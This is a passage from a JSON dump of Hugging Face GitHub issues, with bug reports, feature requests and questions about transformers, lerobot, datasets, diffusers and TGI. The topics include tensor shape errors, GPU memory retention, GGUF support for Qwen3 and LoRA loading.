**kwargs)\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/transformers/models/informer/modeling_informer.py\", line 1568, in forward\n transformer_inputs, loc, scale, static_feat = self.create_network_inputs(\n File \"/home/wjt/.conda/envs/luckluck/lib/python3.9/site-packages/transformers/models/informer/modeling_informer.py\", line 1386, in create_network_inputs\n expanded_static_feat = static_feat.unsqueeze(1).expand(-1, time_feat.shape[1], -1)\nRuntimeError: expand(torch.cuda.FloatTensor{[32, 1, 2, 1]}, size=[-1, 27, -1]): the number of sizes provided (3) must be greater or equal to the number of dimensions in the tensor (4)\n```\n- First\n```\nlog_abs_loc = loc.abs().log1p() if self.config.input", "url": "https://github.com/huggingface/transformers/issues/38745", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-11T07:22:06Z", "updated_at": "2025-07-20T11:41:45Z", "comments": 11, "user": "2004learner" }, { "repo": "huggingface/transformers", "number": 38740, "title": "[DOCS] Add `pruna` as optimization framework", "body": "### Feature request\n\nHave a section on Pruna AI within the documentation. We did [a similar PR for diffusers](https://github.com/huggingface/diffusers/pull/11688) and thought it would be nice to show how to optimize transformers models too. \n.\n\n### Motivation\n\nHave a section on Pruna AI within the documentation to show how to optimize LLMs for inference.\n\n### Your contribution\n\nWe could do everything for the PR.", "url": "https://github.com/huggingface/transformers/issues/38740", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-06-11T04:52:33Z", "updated_at": "2025-07-16T08:56:52Z", "comments": 8, "user": "davidberenstein1957" }, { "repo": "huggingface/sentence-transformers", "number": 3390, "title": "How to create a customized model architecture that fits sentence-transformer's training framework?", "body": "I'd like to train a two tower model that takes categorical features, floats features in one tower, and the other tower just encodes a document using an out of the box embedding. Then the outputs from both towers are feed into sentence transformers loss function. All the training configuration should reuse sentence transformer's setup (loss function implementation, Training Arguments, etc) as much as possible. \n\nIs this even feasible? Skimmed through the document found this page here (https://www.sbert.net/docs/sentence_transformer/usage/custom_models.html#structure-of-sentence-transformer-models), but the example on this page seems to be creating a new module, but only as part of a purely sequential models, each connected to its next. \n\nMuch appreciated! ", "url": "https://github.com/huggingface/sentence-transformers/issues/3390", "state": "open", "labels": [], "created_at": "2025-06-11T03:07:42Z", "updated_at": "2025-06-12T05:05:54Z", "user": "HuangLED" }, { "repo": "huggingface/lerobot", "number": 1258, "title": "Leader Servo Numbering different from script to documentation", "body": "First thank you for sharing this amazing work!\n\nI am initializing the servos for the arm leader and I noticed that the numbering for the Wrist Roll and Wrist Pitch are different from the documentation when I ran the script:\n\n![Image](https://github.com/user-attachments/assets/b12def57-e455-4a0d-8ef0-3e356eab473e)\n\nwrist_roll is set to 5 in the script but set to 4 in the documentation\nwrist_flex is set to 4 in the script but set to 5 (assuming it is Wrist Pitch) in the documentation\n\nI guess nothing to worry about ?\n\n", "url": "https://github.com/huggingface/lerobot/issues/1258", "state": "open", "labels": [ "documentation", "question" ], "created_at": "2025-06-10T21:03:03Z", "updated_at": "2025-08-12T10:04:29Z", "user": "FaboNo" }, { "repo": "huggingface/transformers", "number": 38733, "title": "GRPO per_device_eval_batch_size can't be set as 1, when there is only 1 GPU", "body": "`eval batch size must be evenly divisible by the number of generations per prompt. ` When I only have one GPU, I cannot set `per_device_eval_batch_size=1` because there will be no reasonable G to choose from. Is it possible to automatically calculate a value similar to the number of gradient accumulation steps to achieve this feature?", "url": "https://github.com/huggingface/transformers/issues/38733", "state": "closed", "labels": [], "created_at": "2025-06-10T14:58:11Z", "updated_at": "2025-06-11T09:45:32Z", "comments": 0, "user": "CasanovaLLL" }, { "repo": "huggingface/lerobot", "number": 1254, "title": "[Feature Proposal] Planning a new user friendly simulation environment for new task and data collection", "body": "Hello and bonjour! First and foremost, I really wanted to thanks the team and community for making this wonderful repo. It really helps and guide beginner in this field. And I also wanted to contribute for the community.\n\nReading the issues here, I found a lot of people are trying to run without physical robot. But with the current Aloha and Xarm simulation environment it is hard to config and train new task. So I was thinking to make new env where we could do that.\n\nHere is the main new feature:\n- New sim env we can use as extra like Xarm, Aloha and Pusht in a new repo.\n- Make a simple, game like GUI which enable controlling the manipulator with only keyboard and mouse. (Thinking of making a mini robot on html that can be controlled with mouse, z axis and gripper with keyboard)\n- Make it compatible to recent official MuJoCo release for further [update](https://playground.mujoco.org/) and [extension](https://github.com/google-deepmind/mujoco_warp). (Planning to use [MJX](https://mujoco.readthedocs.io/en/stable/mjx.html)(RL compatible) model)\n- Realtime inference using mujoco view.\n\nI'm a beginner in this field, so it might be a hard task for me. But I thought this this project might help quite people, and also really funny to do. So I'll try my best.\n\nWhat are your thoughts on this proposal? (Sorry if there is already similar features.)\nIf it is okay, I'll start to dig in.\n", "url": "https://github.com/huggingface/lerobot/issues/1254", "state": "open", "labels": [ "question", "simulation" ], "created_at": "2025-06-10T12:36:13Z", "updated_at": "2025-08-12T10:04:42Z", "user": "Bigenlight" }, { "repo": "huggingface/lerobot", "number": 1252, "title": "Failed to sync read 'Present_Position' on ids=[2,3,4,6]after 1 tries. [TxRxResult] There is no status packet", "body": "my arm is koch\uff0cwhen I set the motors ids and baudrates, it report error:\nFailed to sync read 'Present_Position' on ids=[2,3,4,6]after 1 tries. [TxRxResult] There is no status packet", "url": "https://github.com/huggingface/lerobot/issues/1252", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-06-10T10:21:05Z", "updated_at": "2025-09-01T02:24:25Z", "user": "huazai665" }, { "repo": "huggingface/lerobot", "number": 1251, "title": "where is async inference", "body": "hi,thx for your SmolVLA\nI have a question:**where is the async inference?**\nthe eval.py in script doesn't seem for SmolVLA inference\nhope for your early reply,thx in advance", "url": "https://github.com/huggingface/lerobot/issues/1251", "state": "closed", "labels": [], "created_at": "2025-06-10T07:44:38Z", "updated_at": "2025-06-30T11:35:25Z", "user": "JuilieZ" }, { "repo": "huggingface/transformers.js", "number": 1336, "title": "node.js WebGPU compatibility and WASM performance in web enviornment", "body": "### Question\n\nHello!\n\nI've been running some performance benchmarks on whisper models and noticed that the web environment (running in react renderer in electron, separate worker with WASM) produced slower transcription results than the python counterpart (e.g. 1400ms vs 400ms per batch) - both utilizing the same number of threads and data types.\n\nnode.js environment running with WASM was almost on par with python, but unfortunately it won't let me pick webgpu as device - only cpu and dml are supported.\n\nThe onnxruntime-node package does mention webgpu being supported so I was wondering if it will be available for transformers running in node.js environment.\n\nAnd I'm also wondering if the performance drop using WASM in web environment is expected or if I'm doing something wrong.", "url": "https://github.com/huggingface/transformers.js/issues/1336", "state": "open", "labels": [ "question" ], "created_at": "2025-06-10T06:05:36Z", "updated_at": "2025-06-11T06:53:35Z", "user": "devnarekm" }, { "repo": "huggingface/transformers", "number": 38709, "title": "`get_video_features` in XCLIPModel always returns `pooled_output`", "body": "### System Info\n\nhttps://github.com/huggingface/transformers/blob/f4fc42216cd56ab6b68270bf80d811614d8d59e4/src/transformers/models/x_clip/modeling_x_clip.py#L1376\n\nHi\n\nThe `get_video_features` function is hardcoded to always return the `pooled_output`. But sometimes, it might be beneficial to get the `last_hidden_state` instead. Can we fix this behavior?\n\nThanks\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```import av\nimport torch\nimport numpy as np\n\nfrom transformers import AutoProcessor, AutoModel\nfrom huggingface_hub import hf_hub_download\n\nnp.random.seed(0)\n\n\ndef read_video_pyav(container, indices):\n '''\n Decode the video with PyAV decoder.\n Args:\n container (`av.container.input.InputContainer`): PyAV container.\n indices (`List[int]`): List of frame indices to decode.\n Returns:\n result (np.ndarray): np array of decoded frames of shape (num_frames, height, width, 3).\n '''\n frames = []\n container.seek(0)\n start_index = indices[0]\n end_index = indices[-1]\n for i, frame in enumerate(container.decode(video=0)):\n if i > end_index:\n break\n if i >= start_index and i in indices:\n frames.append(frame)\n return np.stack([x.to_ndarray(format=\"rgb24\") for x in frames])\n\n\ndef sample_frame_indices(clip_len, frame_sample_rate, seg_len):\n '''\n Sample a given number of frame indices from the video.\n Args:\n clip_len (`int`): Total number of frames to sample.\n frame_sample_rate (`int`): Sample every n-th frame.\n seg_len (`int`): Maximum allowed index of sample's last frame.\n Returns:\n indices (`List[int]`): List of sampled frame indices\n '''\n converted_len = int(clip_len * frame_sample_rate)\n end_idx = np.random.randint(converted_len, seg_len)\n start_idx = end_idx - converted_len\n indices = np.linspace(start_idx, end_idx, num=clip_len)\n indices = np.clip(indices, start_idx, end_idx - 1).astype(np.int64)\n return indices\n\n\n# video clip consists of 300 frames (10 seconds at 30 FPS)\nfile_path = hf_hub_download(\n repo_id=\"nielsr/video-demo\", filename=\"eating_spaghetti.mp4\", repo_type=\"dataset\"\n)\ncontainer = av.open(file_path)\n\n# sample 8 frames\nindices = sample_frame_indices(clip_len=8, frame_sample_rate=1, seg_len=container.streams.video[0].frames)\nvideo = read_video_pyav(container, indices)\n\nprocessor = AutoProcessor.from_pretrained(\"microsoft/xclip-base-patch32\")\nmodel = AutoModel.from_pretrained(\"microsoft/xclip-base-patch32\")\n\ninputs = processor(\n videos=list(video),\n return_tensors=\"pt\",\n padding=True,\n)\n\n# forward pass\nwith torch.no_grad():\n outputs = model.get_video_features(**inputs)\n\nprint(outputs.shape)\n\n### Expected behavior\n\nThe `get_video_features` function should have the option to output the `last_hidden_state` as well.", "url": "https://github.com/huggingface/transformers/issues/38709", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-10T00:51:37Z", "updated_at": "2025-07-18T08:02:50Z", "comments": 4, "user": "Vishu26" }, { "repo": "huggingface/lerobot", "number": 1242, "title": "SmolVLA Gym Simulation - Release?", "body": "Hello,\n\nI've trained the smolvla_base for 200K steps. I'm trying to do a inference and visualize like we do for aloha or pusht. Could anyone guide me on this. \n\nI dont have a robot arm, so Gym simulation is something I'm looking for, when will it be released?", "url": "https://github.com/huggingface/lerobot/issues/1242", "state": "closed", "labels": [ "question", "policies", "visualization" ], "created_at": "2025-06-09T13:05:38Z", "updated_at": "2025-10-17T11:00:57Z", "user": "Jaykumaran" }, { "repo": "huggingface/smollm", "number": 78, "title": "how to continously pretrain VLM base model", "body": "rt.\nHow can I pretrain VLM base model\uff1f", "url": "https://github.com/huggingface/smollm/issues/78", "state": "open", "labels": [ "Image", "Video" ], "created_at": "2025-06-09T07:04:57Z", "updated_at": "2025-07-29T12:50:50Z", "user": "allenliuvip" }, { "repo": "huggingface/text-generation-inference", "number": 3259, "title": "Enable passing arguments to chat templates", "body": "### Feature request\n\nI would like to enable passing parameters to a chat template when using the messages API. Something like:\n```python\nqwen3_model = HuggingFaceModel(...)\npredictor = qwen3_model.deploy(...)\npredictor.predict({\n\"messages\": [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\" },\n {\"role\": \"user\", \"content\": \"What is deep learning?\"}\n ]\n\"template_args\": { \"enable_thinking\": False }\n})\n```\n\n### Motivation\n\nThere are models with various custom arguments that can be passed to chat templates. For example, Qwen3 comes with `enable_thinking` parameter than can be either True or False, and CohereLabs c4ai-command-r-plus RAG chat template has a `citation_mode` flag that can be `accurate` or `fast`.\n\n### Your contribution\n\nUnfortunately, no. Do not know Rust beyond some basics.", "url": "https://github.com/huggingface/text-generation-inference/issues/3259", "state": "open", "labels": [], "created_at": "2025-06-09T06:04:27Z", "updated_at": "2025-06-09T07:53:17Z", "comments": 2, "user": "alexshtf" }, { "repo": "huggingface/datasets", "number": 7600, "title": "`push_to_hub` is not concurrency safe (dataset schema corruption)", "body": "### Describe the bug\n\nConcurrent processes modifying and pushing a dataset can overwrite each others' dataset card, leaving the dataset unusable.\n\nConsider this scenario:\n- we have an Arrow dataset\n- there are `N` configs of the dataset\n- there are `N` independent processes operating on each of the individual configs (e.g. adding a column, `new_col`)\n- each process calls `push_to_hub` on their particular config when they're done processing\n- all calls to `push_to_hub` succeed\n- the `README.md` now has some configs with `new_col` added and some with `new_col` missing\n\nAny attempt to load a config (using `load_dataset`) where `new_col` is missing will fail because of a schema mismatch between `README.md` and the Arrow files. Fixing the dataset requires updating `README.md` by hand with the correct schema for the affected config. In effect, `push_to_hub` is doing a `git push --force` (I found this behavior quite surprising).\n\nWe have hit this issue every time we run processing jobs over our datasets and have to fix corrupted schemas by hand.\n\nReading through the code, it seems that specifying a [`parent_commit`](https://github.com/huggingface/huggingface_hub/blob/v0.32.4/src/huggingface_hub/hf_api.py#L4587) hash around here https://github.com/huggingface/datasets/blob/main/src/datasets/arrow_dataset.py#L5794 would get us to a normal, non-forced git push, and avoid schema corruption. I'm not familiar enough with the code to know how to determine the commit hash from which the in-memory dataset card was loaded.\n\n### Steps to reproduce the bug\n\nSee above.\n\n### Expected behavior\n\nConcurrent edits to disjoint configs of a dataset should never corrupt the dataset schema.\n\n### Environment info\n\n- `datasets` version: 2.20.0\n- Platform: Linux-5.15.0-118-generic-x86_64-with-glibc2.35\n- Python version: 3.10.14\n- `huggingface_hub` version: 0.30.2\n- PyArrow version: 19.0.1\n- Pandas version: 2.2.2\n- `fsspec` version: 2023.9.0", "url": "https://github.com/huggingface/datasets/issues/7600", "state": "closed", "labels": [], "created_at": "2025-06-07T17:28:56Z", "updated_at": "2025-07-31T10:00:50Z", "comments": 4, "user": "sharvil" }, { "repo": "huggingface/lerobot", "number": 1226, "title": "404 Not Found", "body": "[lerobot](https://github.com/huggingface/lerobot/tree/main)/[examples](https://github.com/huggingface/lerobot/tree/main/examples)\n/10_use_so100.md/ \n\nThis is supposed to be a tutorial but cannot be opened???\n404 Not Found!!!\n", "url": "https://github.com/huggingface/lerobot/issues/1226", "state": "closed", "labels": [ "documentation", "question" ], "created_at": "2025-06-07T09:02:37Z", "updated_at": "2025-06-08T21:26:07Z", "user": "luk-e158" }, { "repo": "huggingface/transformers", "number": 38656, "title": "Potential Memory Leak or Caching in Fast Image Processor", "body": "### System Info\n\nHi team,\n\nThank you for your great work on `transformers`!\n\nWhile using the `AutoProcessor` with `use_fast=True`, I noticed that there seems to be a memory leak or possibly some form of persistent caching when processing images. Even after deleting the processor and clearing the CUDA cache, approximately 600MB of GPU memory remains occupied.\n\nHere is a minimal reproducible example:\n\n```python\nfrom transformers import AutoProcessor\nfrom PIL import Image\nimport time\nimport torch\nimport requests\nfrom io import BytesIO\n\nprocessor = AutoProcessor.from_pretrained(\n \"Qwen/Qwen2.5-VL-7B-Instruct\",\n use_fast=True,\n trust_remote_code=False,\n revision=None,\n)\n\nurl = \"https://github.com/sgl-project/sglang/blob/main/test/lang/example_image.png?raw=true\"\nresponse = requests.get(url)\nimages = [Image.open(BytesIO(response.content)).convert(\"RGB\")]\n\nresult = processor(\n text=[\n \"<|im_start|>system\\nYou are a helpful assistant.<|im_end|>\\n\"\n \"<|im_start|>user\\nWhat\u2019s in this image?<|vision_start|><|image_pad|><|vision_end|><|im_end|>\\n\"\n \"<|im_start|>assistant\\n\"\n ],\n padding=True,\n return_tensors=\"pt\",\n images=images,\n device=\"cuda\"\n)\n\ndel result\ndel processor\ntorch.cuda.empty_cache()\n\nprint(\"You can now use nvidia-smi to observe GPU memory usage, which is around 600MB.\")\nwhile True:\n time.sleep(60)\n```\n\nI\u2019d like to kindly ask:\n\n1. If this is due to caching, is there a way to control or disable the cache?\n2. If this is an unintended memory leak, would it be possible to investigate and potentially fix it?\n\nThanks again for your help and time!\n\nBest regards\n\n### Who can help?\n\ntokenizers: @ArthurZucker and @itazap\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nAs provided above.\n\n### Expected behavior\n\nIt would be great if caching could be made optional, or if there could be an option to avoid any GPU memory usage entirely.", "url": "https://github.com/huggingface/transformers/issues/38656", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-07T08:46:48Z", "updated_at": "2025-08-12T13:02:37Z", "comments": 8, "user": "yhyang201" }, { "repo": "huggingface/transformers", "number": 38654, "title": "The visualization of image input in Qwen2.5-VL", "body": "The image input of Qwen2.5-VL is processed by processor and then saved as tensor in inputs['pixel_values'].\nI tried to restore the image, using tensor in inputs['pixel_values'], but I found that the restored image patches were in disorder.\nSo how to restore the image from inputs['pixel_values'] in a proper way?\n\nFor example, the origin input image is as follows.\n![Image](https://github.com/user-attachments/assets/f40dd6e7-0774-4ad1-b921-73adc320a880)\nAnd failed to restore from the inputs['pixel_values'].\n![Image](https://github.com/user-attachments/assets/e1c9c0ff-d02a-49b0-af21-e98d080452d8)", "url": "https://github.com/huggingface/transformers/issues/38654", "state": "closed", "labels": [], "created_at": "2025-06-07T08:15:44Z", "updated_at": "2025-06-10T09:04:04Z", "comments": 2, "user": "Bytes-Lin" }, { "repo": "huggingface/lerobot", "number": 1223, "title": "smolvla introduce an asynchronous inference stack decoupling perception and action prediction?", "body": "why code not realize?", "url": "https://github.com/huggingface/lerobot/issues/1223", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-06-07T01:23:24Z", "updated_at": "2025-06-08T21:25:04Z", "user": "zmf2022" }, { "repo": "huggingface/transformers", "number": 38650, "title": "Support of Qwen3 GGUF model", "body": "Hi, I am getting the following error when I want to use the GGUF model with Qwen3\n\"ValueError: GGUF model with architecture qwen3 is not supported yet.\"\n\nI have the latest transformers and gguf-0.17.0\n```\nself.tokenizer = AutoTokenizer.from_pretrained(model_name, gguf_file= \"Qwen3-0.6B-Q2_K_L.gguf\",use_fast=True)\n if self.tokenizer.pad_token is None:\n self.tokenizer.pad_token = \"\"\n self.tokenizer.add_special_tokens({\"pad_token\": \"\"})\n self.tokenizer.padding_side = \"left\"\n self.model = AutoModelForCausalLM.from_pretrained(\n model_name,\n gguf_file = \"Qwen3-0.6B-Q2_K_L.gguf\",\n pad_token_id=self.tokenizer.pad_token_id,\n trust_remote_code=True,\n torch_dtype=torch.bfloat16,\n device_map=\"auto\",\n )\n```\nHow can I use the gguf model of Qwen3 with transformers? Could you please add the support of it?\n\nThanks!", "url": "https://github.com/huggingface/transformers/issues/38650", "state": "closed", "labels": [], "created_at": "2025-06-06T20:11:23Z", "updated_at": "2025-07-15T08:02:59Z", "comments": 2, "user": "Auth0rM0rgan" }, { "repo": "huggingface/diffusers", "number": 11675, "title": "Error in loading the pretrained lora weights", "body": "Hi, I am using the script https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_lora_sdxl.py to train a lora.\n\nAn error is raised on https://github.com/huggingface/diffusers/blob/73a9d5856f2d7ae3637c484d83cd697284ad3962/examples/text_to_image/train_text_to_image_lora_sdxl.py#L1314C9-L1314C52\n\n```\nLoading adapter weights from state_dict led to missing keys in the model: down_blocks.1.attentions.0.transformer_blocks.0.attn1.to_q.lora_A\n.default_0.weight, down_blocks.1.attentions.0.transformer_blocks.0.attn1.to_q.lora_B.default_0.weight, ...\n```\n\nThe difference between the keys in the saved lora weights and the ''missing keys'' mentioned above is ''default_0''. How can I resolve this problem?\n\ndiffusers 0.32.2\npeft 0.15.2\n", "url": "https://github.com/huggingface/diffusers/issues/11675", "state": "closed", "labels": [], "created_at": "2025-06-06T17:09:45Z", "updated_at": "2025-06-07T07:40:14Z", "comments": 1, "user": "garychan22" }, { "repo": "huggingface/text-generation-inference", "number": 3257, "title": "if use chat.completions, text+image inference return incorrect output because of template issue", "body": "### System Info\n\ncommon in all platform\n\n### Information\n\n- [ ] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\ntext-generation-launcher --model-id=llava-hf/llava-v1.6-mistral-7b-hf --max-input-tokens 4096 --max-batch-prefill-tokens 16384 --max-total-tokens 8192 --max-batch-size 4\n\nclient:\n\n```\nfrom openai import OpenAI\n\nclient = OpenAI(base_url=\"http://localhost:80/v1\", api_key=\"-\")\n\nchat_completion = client.chat.completions.create(\n model=\"tgi\",\n messages=[\n {\n \"role\": \"user\",\n \"content\": [\n {\n \"type\": \"image_url\",\n \"image_url\": {\n \"url\": \"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/transformers/rabbit.png\"\n },\n },\n {\"type\": \"text\", \"text\": \"Whats in this image?\"},\n ],\n },\n ],\n max_tokens=50,\n temperature=0.0,\n stream=False,\n)\n\nprint(chat_completion)\n\n```\n\n### Expected behavior\n\nincorrect output is\nChatCompletion(id='', choices=[Choice(finish_reason='stop', index=0, logprobs=None, message=ChatCompletionMessage(content=\" I'm sorry, but I'm not sure what you're asking. Can you please provide more context or information about what you're looking for? \", refusal=None, role='assistant', audio=None, function_call=None, tool_calls=None))], created=1749197214, model='llava-hf/llava-v1.6-mistral-7b-hf', object='chat.completion', service_tier=None, system_fingerprint='3.3.1-dev0-native', usage=CompletionUsage(completion_tokens=35, prompt_tokens=8, total_tokens=43, completion_tokens_details=None, prompt_tokens_details=None))\n\n", "url": "https://github.com/huggingface/text-generation-inference/issues/3257", "state": "open", "labels": [], "created_at": "2025-06-06T13:06:20Z", "updated_at": "2025-06-06T13:11:22Z", "comments": 2, "user": "sywangyi" }, { "repo": "huggingface/nanotron", "number": 372, "title": "datatrove need numpy>=2.0.0 bug nanotron 0.4 requires numpy<2, how to fix?", "body": "", "url": "https://github.com/huggingface/nanotron/issues/372", "state": "open", "labels": [], "created_at": "2025-06-06T12:12:39Z", "updated_at": "2025-11-22T14:44:01Z", "user": "lxyyang" }, { "repo": "huggingface/transformers", "number": 38613, "title": "MDX Errors", "body": "### System Info\n\nUbuntu 24.04.2 LTS, CPython 3.11.12, transformers==4.53.0.dev0\n\n\n@stevhliu I'm trying to contribute to the model cards. I forked the latest transformers and I ran the scripts, from the home page and then I want to the documents page. I'm having issues with the doc builder. I keep receiving the errors \"ValueError: There was an error when converting docs/source/en/internal/generation_utils.md to the MDX format.\nUnable to find generation.TFGreedySearchEncoderDecoderOutput in transformers. Make sure the path to that object is correct.\" And Unable to find image_processing_utils_fast.BaseImageProcessorFast in transformers. Make sure the path to that object is correct.\n\nI ran the \" pip install -e \".[docs]\" and saw this after installing everything: \"warning: The package `transformers @ file://s` does not have an extra named `docs`\"\n\nI ran the doc builder and that ran as expected until I ran the doc-builder command \"doc-builder build transformers docs/source/en/ --build_dir ~/tmp/test-build\"\n\nIs there something that I'm misunderstanding? Is there a workaround for me to write the markdown of the card that I have been assigned without having to run those scripts instead, in the meantime.. Thank you!\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nRan install scripts on the Documents folder\n\n### Expected behavior\n\nTo generate the docs", "url": "https://github.com/huggingface/transformers/issues/38613", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-05T14:19:45Z", "updated_at": "2025-06-06T20:12:36Z", "comments": 7, "user": "rileyafox" }, { "repo": "huggingface/diffusers", "number": 11661, "title": "[BUG]: Using args.max_train_steps even if it is None in diffusers/examples/flux-control", "body": "### Describe the bug\n\nUnder [https://github.com/huggingface/diffusers/tree/main/examples/flux-control](examples/flux-control) there are two files showing how to fine tune flux-control:\n- [train_control_flux.py](https://github.com/huggingface/diffusers/blob/main/examples/flux-control/train_control_flux.py)\n- [train_control_lora_flux.py](https://github.com/huggingface/diffusers/blob/main/examples/flux-control/train_control_lora_flux.py)\nBoth of them have a bug when args.max_train_steps is None:\nStarting from [Line 905](https://github.com/huggingface/diffusers/blob/c934720629837257b15fd84d27e8eddaa52b76e6/examples/flux-control/train_control_flux.py#L905) we have following code:\n```.py\nif args.max_train_steps is None:\n len_train_dataloader_after_sharding = math.ceil(len(train_dataloader) / accelerator.num_processes)\n num_update_steps_per_epoch = math.ceil(len_train_dataloader_after_sharding / args.gradient_accumulation_steps)\n num_training_steps_for_scheduler = (\n args.num_train_epochs * num_update_steps_per_epoch * accelerator.num_processes\n )\n else:\n num_training_steps_for_scheduler = args.max_train_steps * accelerator.num_processes\n\n lr_scheduler = get_scheduler(\n args.lr_scheduler,\n optimizer=optimizer,\n num_warmup_steps=args.lr_warmup_steps * accelerator.num_processes,\n num_training_steps=args.max_train_steps * accelerator.num_processes,\n num_cycles=args.lr_num_cycles,\n power=args.lr_power,\n )\n```\nNote how it gets checked that `args.max_train_steps` is None in the if, in this case a num_training_steps_for_scheduler gets prepared. However in [Line 918](https://github.com/huggingface/diffusers/blob/c934720629837257b15fd84d27e8eddaa52b76e6/examples/flux-control/train_control_flux.py#L918) we use `args.max_train_steps`\n```.py\n num_training_steps=args.max_train_steps * accelerator.num_processes,\n```\nisntead of the prepared num_training_steps_for_scheduler and causing following error:\n```.sh\nnum_training_steps=args.max_train_steps * accelerator.num_processes,\n ~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~\nTypeError: unsupported operand type(s) for *: 'NoneType' and 'int'\n```\n\n### Reproduction\n\nTraining runs where the max_train_steps are not set, i.e.:\n```.sh\naccelerate launch train_control_lora_flux.py \\\n --pretrained_model_name_or_path=\"black-forest-labs/FLUX.1-dev\" \\\n --dataset_name=\"raulc0399/open_pose_controlnet\" \\\n --output_dir=\"pose-control-lora\" \\\n --mixed_precision=\"bf16\" \\\n --train_batch_size=1 \\\n --rank=64 \\\n --gradient_accumulation_steps=4 \\\n --gradient_checkpointing \\\n --use_8bit_adam \\\n --learning_rate=1e-4 \\\n --report_to=\"wandb\" \\\n --lr_scheduler=\"constant\" \\\n --lr_warmup_steps=0 \\\n --num_train_epochs=10 \\\n --validation_image=\"openpose.png\" \\\n --validation_prompt=\"A couple, 4k photo, highly detailed\" \\\n --offload \\\n --seed=\"0\" \\\n --push_to_hub\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nNot relevant for the mentioned Bug.\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/11661", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-05T07:18:06Z", "updated_at": "2025-06-05T09:26:26Z", "comments": 0, "user": "Markus-Pobitzer" }, { "repo": "huggingface/lerobot", "number": 1203, "title": "Could you please upload the config.json file for smolvla?", "body": "\n\nCould you please upload the config.json file for smolvla? Thank you very much!\n\n\nFileNotFoundError: config.json not found on the HuggingFace Hub in lerobot/smolvla_base\n\n", "url": "https://github.com/huggingface/lerobot/issues/1203", "state": "closed", "labels": [ "question" ], "created_at": "2025-06-05T06:59:12Z", "updated_at": "2025-06-11T14:56:56Z", "user": "Pandapan01" }, { "repo": "huggingface/transformers", "number": 38601, "title": "Contribute to Transformers on windows natively without WSL", "body": "### System Info\n\n### System info\nOS: Windows 11\nPython: 3.13.3 and 3.10\nGit: 2.49.0\nCMake: 4.0.2\nMsys64: Pacman v6.1.0 - libalpm v14.0.0\nPip: 25.1.1 \nSetuptools: 80.9.0\nVisual studio C++ build tools\n\n### NOTE: I followed the steps here [Contribute to \ud83e\udd17 Transformers](https://huggingface.co/docs/transformers/en/contributing) and for sure system info already existed before following but let me walk through again for additional info.\n1- Forked the repo.\n2- Cloned it\n3- cd transformers (so made sure I am in the right path which is the root for the repo)\n3- switched to my own branch\n4- made a python virtual environment using python 3.10 then activated it \n5- made sure transformers ain't installed inside it\n6- installed PyTorch\n7- Ran this command `pip install -e \".[dev]\"`\n\n\n### NOTE: I tried making requirements.txt and using this command `pip install -r requirements.txt` but I got no output and I tried installing onnx with pip which happened successfully then Ran this command `pip install -e \".[dev]\"` but nothing changed\n\n### NOTE 6/6/2025: I tried uv instead of python venv, nothing worked. I tried deleting everything including system info and install everything from the beginning, nothing worked still. I made a requiremets.txt from what is in setup.py and installed it and tried to run `pip install -e \".[dev]\"` but same issues again, nothing worked\n\n```\n error: subprocess-exited-with-error\n\n \u00d7 python setup.py egg_info did not run successfully.\n \u2502 exit code: 1\n \u2570\u2500> [11 lines of output]\n ...\\setup.py:36: DeprecationWarning: Use shutil.which instead of find_executable\n CMAKE = find_executable('cmake3') or find_executable('cmake')\n ...\\setup.py:37: DeprecationWarning: Use shutil.which instead of find_executable\n MAKE = find_executable('make')\n fatal: not a git repository (or any of the parent directories): .git\n Traceback (most recent call last):\n File \"\", line 2, in \n File \"\", line 35, in \n File \"...\\setup.py\", line 318, in \n raise FileNotFoundError(\"Unable to find \" + requirements_file)\n FileNotFoundError: Unable to find requirements.txt\n [end of output]\n\n note: This error originates from a subprocess, and is likely not a problem with pip.\nerror: metadata-generation-failed\n\n\u00d7 Encountered error while generating package metadata.\n\u2570\u2500> See above for output.\n\nnote: This is an issue with the package mentioned above, not pip.\nhint: See above for details.\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n`pip install -e \".[dev]\"`\n\n### Expected behavior\n\nBeing able to install transformers for contributing with no issue", "url": "https://github.com/huggingface/transformers/issues/38601", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-05T04:14:12Z", "updated_at": "2025-07-27T08:02:54Z", "comments": 4, "user": "ghost" }, { "repo": "huggingface/diffusers", "number": 11657, "title": "Custom Wan diffusion Lora runs without error but doesn't apply effect and gives warning: No LoRA keys associated to WanTransformer3DModel found with the prefix='transformer'.", "body": "### Describe the bug\n\nI run the diffusers pipe using the standard process with a custom diffusers trained lora: \n\npipe = WanPipeline.from_pretrained(model_id, vae=vae, torch_dtype=torch.bfloat16)\npipe.scheduler = 